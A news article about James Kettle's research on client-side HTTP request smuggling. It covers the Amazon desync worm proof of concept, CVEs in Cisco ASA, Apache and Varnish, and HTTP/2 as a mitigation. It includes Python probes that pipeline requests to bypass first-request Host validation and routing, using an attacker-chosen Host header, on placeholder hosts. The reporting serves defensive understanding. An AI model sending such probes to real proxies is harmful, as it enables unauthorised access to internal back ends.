New HTTP Request Smuggling Attacks Target Web Browsers
Threat actors can abuse weaknesses in HTTP request handling to launch damaging browser-based attacks on website users, researcher says.
August 11, 2022
BLACK HAT USA – LAS VEGAS – A security researcher who previously demonstrated how attackers can abuse weaknesses in the way websites handle HTTP requests warned that the same issues can be used in damaging browser-based attacks against users.
James Kettle, director of research at PortSwigger, described his research as shedding new light on so-called desync attacks that exploit disagreements in how a website's back-end and front-end servers interpret HTTP requests. Previously, at Black Hat USA 2019, Kettle showed how attackers could trigger these disagreements (over things like message length, for instance) to route HTTP requests to a back-end component of their choice, steal credentials, invoke unexpected responses from an application, and carry out other malicious actions. Kettle has also previously shown how HTTP/2 implementation errors can put websites at risk of compromise.
Kettle's new research focuses on how threat actors can exploit the same improper HTTP request handling to also target website users: stealing their credentials, installing backdoors, and compromising their systems in other ways. Kettle said he had identified HTTP handling anomalies enabling such client-side desync attacks on Amazon.com and on sites using AWS Application Load Balancer, Cisco ASA WebVPN, Akamai, Varnish Cache servers, and Apache HTTP Server 2.4.52 and earlier.
The main difference between server-side desync attacks and client-side desync, Kettle said in a conversation with Dark Reading following his presentation, is that the former requires a target with a reverse proxy front end and at least partly malformed requests sent from attacker-controlled systems. A browser-powered attack, by contrast, takes place within the victim's Web browser, using legitimate requests. As an example of what an attacker could do, Kettle showed a proof-of-concept in which he was able to capture information such as the authentication tokens of random Amazon users and store it in his own shopping list. He also found he could have made each infected victim on Amazon's site relaunch the attack against others.
"This would have released a desync worm — a self-replicating attack which exploits victims to infect others with no user interaction, rapidly exploiting every active user on Amazon," Kettle said. Amazon has since fixed the issue.
Cisco opened a CVE for the vulnerability (CVE-2022-20713) after Kettle informed the company about it and described the issue as allowing an unauthenticated, remote attacker to conduct browser-based attacks on website users. "An attacker could exploit this vulnerability by convincing a targeted user to visit a website that can pass malicious requests to an ASA device that has the Clientless SSL VPN feature enabled," the company noted. "A successful exploit could allow the attacker to conduct browser-based attacks, including cross-site scripting attacks, against the targeted user."
Apache identified its HTTP request smuggling vulnerability (CVE-2022-22720) as tied to a failure "to close inbound connection when errors are encountered discarding the request body." Varnish described its vulnerability (CVE-2022-23959) as allowing attackers to inject spurious responses on client connections.
In a whitepaper released today, Kettle said there were two separate scenarios where HTTP handling anomalies could have security implications.
One was first-request validation. Front-end servers that handle HTTP requests use the Host header to identify which back-end component to route each request to, and these proxy servers often maintain a whitelist of hosts that clients are allowed to access. Kettle discovered that some front-end or proxy servers apply the whitelist only to the first request sent over a connection, not to subsequent requests sent over the same connection. Attackers can abuse this to gain access to an otherwise off-limits component by first sending a request to an allowed destination and then following up with a request to their real target.
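The following probe is a minimal sketch of what abusing first-request validation looks like on the wire, using hypothetical hostnames (proxy.example.com, allowed.example.com, internal.example.com): two requests pipelined over a single TCP connection, with only the first carrying a whitelisted Host header. Real front ends vary in how they pool and validate connections, so this is illustrative rather than a working exploit for any particular product.

```python
# Illustrative sketch of a first-request validation bypass. All hostnames
# are placeholders; the proxy is assumed to validate the Host header only
# on the first request of each connection.
import socket

PROXY = ("proxy.example.com", 80)

# Request 1 targets a whitelisted host, so the connection is accepted.
first = (
    b"GET / HTTP/1.1\r\n"
    b"Host: allowed.example.com\r\n"
    b"\r\n"
)

# Request 2 reuses the same connection but names an internal host that
# would be rejected if it arrived on a fresh connection.
second = (
    b"GET /admin HTTP/1.1\r\n"
    b"Host: internal.example.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)

with socket.create_connection(PROXY) as sock:
    sock.sendall(first + second)
    response = b""
    while chunk := sock.recv(4096):
        response += chunk

# If the whitelist is enforced only on the first request, the second
# response comes from internal.example.com despite the restriction.
print(response.decode(errors="replace"))
```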
Another closely related but far more common issue Kettle encountered stemmed from first-request routing. Here, the front-end or proxy server looks at the first request's Host header to decide which back end to route it to, then sends all subsequent requests from the same client connection to that back end. In environments where the Host header is handled unsafely, this gives attackers an opportunity to reach any back-end component and carry out a variety of attacks, Kettle said.
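A similar sketch illustrates first-request routing, again with hypothetical hostnames: the first request pins the connection to the target's back end, and a follow-up request with an arbitrary Host header is still delivered there, which matters if that back end uses the Host header unsafely (for instance, when generating absolute URLs).

```python
# Illustrative sketch of first-request routing abuse. Hostnames are
# placeholders; the front end is assumed to choose a back end based on
# the first request's Host header and reuse it for the whole connection.
import socket

FRONT_END = ("front-end.example.com", 80)

# Request 1 pins the connection to the back end serving target.example.com.
pin = (
    b"GET / HTTP/1.1\r\n"
    b"Host: target.example.com\r\n"
    b"\r\n"
)

# Request 2 carries an attacker-chosen Host header but is still processed
# by target.example.com's back end, where the header may flow into
# redirects, links, or cache keys.
follow_up = (
    b"GET /login HTTP/1.1\r\n"
    b"Host: attacker.example.com\r\n"
    b"Connection: close\r\n"
    b"\r\n"
)

with socket.create_connection(FRONT_END) as sock:
    sock.sendall(pin + follow_up)
    response = b""
    while chunk := sock.recv(4096):
        response += chunk

print(response.decode(errors="replace"))
```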
The best way for websites to mitigate client-side desync attacks is to use HTTP/2 end to end, Kettle said. It's generally a bad idea to have a front end that accepts HTTP/2 from clients but downgrades requests to HTTP/1.1 for the back end. "If your company routes employees' traffic through a forward proxy, ensure upstream HTTP/2 is supported and enabled," Kettle advised. "Please note that the use of forward proxies also introduces a range of extra request-smuggling risks beyond the scope of this paper."
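For teams checking their own sites, one small, hedged starting point is to confirm that the client-facing edge at least negotiates HTTP/2. The sketch below uses the third-party httpx library (with its optional HTTP/2 extra installed) against a placeholder URL; it only inspects the hop between the browser and the front end, while the front-end-to-back-end hop has to be verified in the proxy's own configuration.

```python
# Minimal sketch: check which HTTP version the client-facing edge
# negotiates. Requires httpx with HTTP/2 support (pip install 'httpx[http2]').
# The URL is a placeholder, and a result of "HTTP/2" says nothing about
# the upstream hop to the back end, which must be confirmed separately.
import httpx

def edge_http_version(url: str) -> str:
    """Return the HTTP version negotiated with the front-end server."""
    with httpx.Client(http2=True) as client:
        response = client.get(url)
    return response.http_version  # e.g. "HTTP/2" or "HTTP/1.1"

if __name__ == "__main__":
    print(edge_http_version("https://example.com/"))
```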